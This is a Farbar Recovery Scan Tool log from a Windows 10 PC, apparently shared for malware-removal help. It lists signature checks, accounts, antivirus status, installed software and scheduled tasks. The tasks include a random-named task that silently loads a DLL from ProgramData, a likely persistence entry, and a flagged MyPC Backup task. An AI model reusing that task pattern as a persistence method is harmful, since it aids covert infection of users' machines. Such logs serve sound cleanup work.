    C:\Users\Kym\AppData\Local\Temp\SIInvoker.exe
    C:\Users\Kym\AppData\Local\Temp\tmp5300.exe
    C:\Users\Kym\AppData\Local\Temp\tmp93FD.exe
    C:\Users\Kym\AppData\Local\Temp\vlc-2.2.1-win32.exe


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-02-29 12:25

    ==================== End of FRST.txt ============================

    Additional scan result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
    Ran by Kym (2016-02-29 20:46:27)
    Running from C:\Users\Kym\Desktop
    Windows 10 Home (X64) (2015-08-08 15:48:30)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-788086572-3644745805-1037152649-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-788086572-3644745805-1037152649-503 - Limited - Disabled)
    Guest (S-1-5-21-788086572-3644745805-1037152649-501 - Limited - Disabled)
    HomeGroupUser$ (S-1-5-21-788086572-3644745805-1037152649-1002 - Limited - Enabled)
    Kym (S-1-5-21-788086572-3644745805-1037152649-1000 - Administrator - Enabled) => C:\Users\Kym

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
    AS: Spybot - Search and Destroy (Enabled - Up to date) {A16C3F68-9280-E053-1818-342707FECF4D}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    µTorrent (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\uTorrent) (Version: 3.4.5.41712 - BitTorrent Inc.)
    Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
    Adobe Photoshop CC 2014 (HKLM-x32\...\{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}) (Version: 15.0 - Adobe Systems Incorporated)
    Adobe Premiere Elements 11 (HKLM\...\PremElem110) (Version: 11.0 - Adobe Systems Incorporated)
    Adobe Premiere Elements 11 (Version: 11.0 - Adobe Systems Incorporated) Hidden
    Adobe Reader XI (11.0.13) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
    AMD Install Manager (HKLM\...\AMD Catalyst Install Manager) (Version: 5.00 - Advanced Micro Devices, Inc.)
    Apple Application Support (32-bit) (HKLM-x32\...\{3540ADD5-822B-47FB-B1C2-CD7B2C8E9FEC}) (Version: 4.0.2 - Apple Inc.)
    Apple Application Support (64-bit) (HKLM\...\{C9C0FE2C-602E-49D7-8C42-5B9E8FF04798}) (Version: 4.0.2 - Apple Inc.)
    Apple Mobile Device Support (HKLM\...\{FD244E19-6EFE-4A2D-948A-0D45D4C168BE}) (Version: 9.0.0.26 - Apple Inc.)
    Apple Software Update (HKLM-x32\...\{FFD1F7F1-1AC9-4BC4-A908-0686D635ABAF}) (Version: 2.1.4.131 - Apple Inc.)
    Arma 3 (HKLM-x32\...\Steam App 107410) (Version: - Bohemia Interactive)
    Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 10.2.2218 - AVAST Software)
    Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
    Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
    Beyond Gravity (HKLM-x32\...\Steam App 317510) (Version: - Qwiboo Ltd)
    BioShock (HKLM-x32\...\Steam App 7670) (Version: - 2K Boston)
    BioShock 2 (HKLM-x32\...\Steam App 8850) (Version: - 2K Marin)
    BioShock Infinite (HKLM-x32\...\Steam App 8870) (Version: - Irrational Games)
    Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
    Brother MFL-Pro Suite DCP-J4110DW (HKLM-x32\...\{DD98C438-D769-4677-AA87-3481FA32D20C}) (Version: 2.0.0.0 - Brother Industries, Ltd.)
    Catalyst Control Center Next Localization BR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CHS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CHT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization CS (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization DA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization DE (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization EL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization ES (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization FI (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization FR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization HU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization IT (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization JA (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization KO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization NL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization NO (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization PL (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization RU (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization SV (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization TH (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Catalyst Control Center Next Localization TR (Version: 2015.1204.1216.22046 - Advanced Micro Devices, Inc.) Hidden
    Clicker Heroes (HKLM-x32\...\Steam App 363970) (Version: - Playsaurus)
    Contagion (HKLM-x32\...\Steam App 238430) (Version: - Monochrome LLC)
    Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
    Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
    DayZ (HKLM-x32\...\Steam App 221100) (Version: - Bohemia Interactive)
    Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
    Dota 2 (HKLM-x32\...\Steam App 570) (Version: - Valve)
    Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    f.lux (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Flux) (Version: - )
    Full Tilt Poker (HKLM-x32\...\{D4C9692E-4EFA-4DA0-8B7F-9439466D9E31}) (Version: 5.44.1.WIN.FullTilt.COM - )
    Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
    Google Drive (HKLM-x32\...\{EF61675D-9BBC-4EC7-B906-F13BE8D3BD20}) (Version: 1.27.1227.2094 - Google, Inc.)
    Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
    Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
    Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment)
    Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version: - Blizzard Entertainment)
    IBM SPSS Statistics 23 (HKLM\...\{C3BA73A4-2A45-4036-8541-4F5F8146078B}) (Version: 23.0.0.0 - IBM Corp)
    iExplorer 3.6.1.0 (HKLM-x32\...\{7FD8B0C1-CDDA-4B4D-A577-B2E3570EA3A3}_is1) (Version: - Macroplant LLC)
    Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation)
    Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3308 - Intel Corporation)
    Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
    Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
    Internode Monthly Usage Meter 8.6.3 (HKLM-x32\...\Internode Monthly Usage Meter_is1) (Version: - )
    iTunes (HKLM\...\{88509E20-3936-4D88-A1C0-B274C7BB5151}) (Version: 12.3.0.44 - Apple Inc.)
    Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
    Java 8 Update 74 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218074F0}) (Version: 8.0.740.2 - Oracle Corporation)
    League of Legends (HKLM-x32\...\League of Legends 3.0.0) (Version: 3.0.0 - Riot Games)
    League of Legends (x32 Version: 3.0.0 - Riot Games) Hidden
    Left 4 Dead 2 (HKLM-x32\...\Steam App 550) (Version: - Valve)
    Logitech G35 (HKLM\...\{27607A94-33AC-4AA7-AACE-95AF6ACA3E30}) (Version: 1.1.178 - Logitech)
    Logitech Gaming Software 8.70 (HKLM\...\Logitech Gaming Software) (Version: 8.70.315 - Logitech Inc.)
    LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.410 - LogMeIn, Inc.)
    LogMeIn Hamachi (x32 Version: 2.2.0.410 - LogMeIn, Inc.) Hidden
    Marvel Heroes 2015 (HKLM-x32\...\Steam App 226320) (Version: - Gazillion Entertainment)
    Metro: Last Light (HKLM-x32\...\Steam App 43160) (Version: - 4A Games)
    Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
    Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
    Middle Earth Shadow of Mordor (HKLM-x32\...\Middle Earth Shadow of Mordor_is1) (Version: - )
    Monaco What's Yours Is Mine (HKLM-x32\...\Monaco What's Yours Is Mine_is1) (Version: Monaco What's Yours Is Mine - )
    MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
    MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
    Nitronic Rush (IGF Pro 2012) version 20111017.0 (HKLM-x32\...\{9B55759D-424F-4CB1-B84E-AAE83CC1D20A}_is1) (Version: 20111017.0 - DigiPen)
    Nuance PaperPort 12 (HKLM-x32\...\{88B5FBDC-967D-4B1F-B291-39284AE12201}) (Version: 12.1.0005 - Nuance Communications, Inc.)
    Nuance PDF Viewer Plus (HKLM-x32\...\{28656860-4728-433C-8AD4-D1A930437BC8}) (Version: 5.30.3290 - Nuance Communications, Inc)
    NVIDIA PhysX (HKLM-x32\...\{80407BA7-7763-4395-AB98-5233F1B34E65}) (Version: 9.13.1220 - NVIDIA Corporation)
    ON_OFF Charge 2 B13.1028.1 (HKLM-x32\...\InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Version: 1.00.0000 - GIGABYTE)
    ON_OFF Charge 2 B13.1028.1 (x32 Version: 1.00.0000 - GIGABYTE) Hidden
    Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version: - )
    OpenAL (HKLM-x32\...\OpenAL) (Version: - )
    Outils de vérification linguistique 2013 de Microsoft Office*- Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
    PaperPort Image Printer 64-bit (HKLM\...\{715CAACC-579B-4831-A5F4-A83A8DE3EFE2}) (Version: 14.00.0000 - Nuance Communications, Inc.)
    PokerStars (HKLM-x32\...\PokerStars) (Version: - PokerStars)
    PRE11 STI 64Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
    QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
    Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.2.4 - Razer Inc.)
    Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 1.18.21.28188 - Razer Inc.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
    Remote Mouse version 2.70 (HKLM-x32\...\{01E4BC6D-3ACC-45E1-8928-C2FF626F63F3}_is1) (Version: 2.70 - Remote Mouse)
    Scansoft PDF Professional (x32 Version: - ) Hidden
    Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
    Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (Version: - Microsoft) Hidden
    Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version: - 2K Games, Inc.)
    Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
    Skype™ 7.0 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.0.102 - Skype Technologies S.A.)
    Spotify (HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Spotify) (Version: 1.0.21.143.g76c19bcd - Spotify AB)
    Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.5.43 - Safer-Networking Ltd.)
    StarCraft II (HKLM-x32\...\StarCraft II) (Version: - Blizzard Entertainment)
    Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
    Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version: - Valve)
    TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
    TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version: - TechPowerUp)
    The Elder Scrolls V: Skyrim (HKLM-x32\...\Steam App 72850) (Version: - Bethesda Game Studios)
    Tom Clancy's Rainbow Six Siege (HKLM-x32\...\Steam App 359550) (Version: - Ubisoft Montreal)
    Total War: ROME II (HKLM-x32\...\Steam App 214950) (Version: - Creative Assembly)
    Tweaking.com - Registry Backup (HKLM-x32\...\Tweaking.com - Registry Backup) (Version: 3.3.1 - Tweaking.com)
    Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{0FA8AE0C-69AE-4F60-A1AB-F79C6BA5A999}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Update for Skype for Business 2015 (KB3114732) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{AD89B6F9-C98A-4506-ABDE-782B0959CC84}) (Version: - Microsoft)
    Uplay (HKLM-x32\...\Uplay) (Version: 14.0 - Ubisoft)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
    WinRAR 5.10 beta 4 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.10.4 - win.rar GmbH)
    World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment)

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-788086572-3644745805-1037152649-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Kym\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe => No File

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {00BB5CDE-A0A3-4126-A329-684FCE96F2DA} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
    Task: {050D098B-C2C3-4064-986C-7B3596E444B9} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
    Task: {052BB96E-EC57-4A5E-A676-5F530A65E1E1} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
    Task: {0670C04C-B47A-469A-BABD-11885BDDC6F8} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
    Task: {0FD0CF68-1874-4073-9CEF-63D8E9B7BFA5} - System32\Tasks\LaunchSignup => C:\Program Files (x86)\MyPC Backup\Signup Wizard.exe <==== ATTENTION
    Task: {105E72D9-5D9B-4EBD-BC8B-F6126EAAA214} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {111506E3-934F-4F4D-9D88-D03FD254704B} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-07-16] (Adobe Systems Incorporated)
    Task: {12E05F11-8F42-466E-B87E-05F00D57783A} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {154B1B4C-8AD3-4E88-87B8-08F151623FF3} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
    Task: {19DDEC2D-39E9-4390-B737-F534A99F91FC} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
    Task: {1EB27F80-D69B-4285-8431-E37E2A44624A} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
    Task: {23C32510-6B84-4F00-B6A2-A3556CA995C0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
    Task: {2425DF79-2B81-4356-8999-0E846F585C3E} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
    Task: {3405AE0C-9596-4F8A-B29D-FDD7C18CB80B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
    Task: {3E5A6177-182D-4F8D-A9F3-8E88742C9F43} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe
    Task: {3F60BAAC-153B-4504-9150-B1875260A145} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)
    Task: {40943A4E-8129-4656-ADEA-C3441A09E687} - System32\Tasks\{9DCFB73E-9A6F-ACFC-B0BC-4203F9A4BD3D} => /s /n /i:"/rt" "C:\PROGRA~3\3c355888\4543324a.dll"
    Task: {4444829F-A5AF-49DC-AF46-C3F292BDE7F4} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-14] (Adobe Systems Incorporated)
    Task: {4751C4C6-6F55-4FD3-A873-D2FF79B6ABA6} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
    Task: {4A494596-5721-43AD-B292-95778C23DE63} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {4C4DB1A9-42FA-4381-9A15-5850F64B0A92} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
    Task: {57517555-5931-478E-AC60-FE526E78EA1D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
    Task: {5AE7144B-08D0-4C2C-83D2-0E78DFE05C4D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe
    Task: {672C6DB8-E782-46C4-862A-91937DDD6CCD} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
    Task: {6A6EF366-2189-44F1-810D-31ADBAD25AD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-07] (Google Inc.)
    Task: {6EC4A1B2-08CF-4BE5-86DE-014C8ED8CEFF} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
    Task: {70F8276A-CEAC-48F6-AF84-A7EF81E36D85} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
    Task: {8E8CEF76-7805-4BD1-90FE-CC39F53EDC96} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
    Task: {9F538C47-5B98-42B5-A6A0-FFC9989F17DE} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {A39A9765-388B-4CFB-9115-FF2DE387651A} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
    Task: {AD51084B-8DF2-45A4-A9D7-BB445D07A559} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
    Task: {B771CEDA-ABD2-43D9-9157-9B1E2DEE95CB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
    Task: {B7A49348-60C5-42CB-A154-78E339B9B4EE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe
    Task: {C16563DF-BFCB-40D7-BD4E-0C8FFFFCE317} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
    Task: {C4FE1DCE-FEAA-4B30-95BA-F1A5394963A4} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {C85142E9-7D8C-4BBB-8B73-0987957BAFF6} - System32\Tasks\AMD Updater => C:\Program Files\AMD\CIM\\Bin64\InstallManagerApp.exe [2015-12-04] (Advanced Micro Devices, Inc.)
    Task: {CA6266EC-F1C1-4C19-AA06-B0AD8D0AB114} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
    Task: {CD7F75C4-6EF1-4B40-A64D-B4F4D874B8BC} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe [2015-06-16] (Safer-Networking Ltd.)
    Task: {D034A175-EFC9-4CF2-A88F-697EA1808E3E} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
    Task: {DD980370-DE9B-48AE-8689-09B4DE7A48CE} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
    Task: {E4C27559-2796-43A7-BB20-D17DF93E1921} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
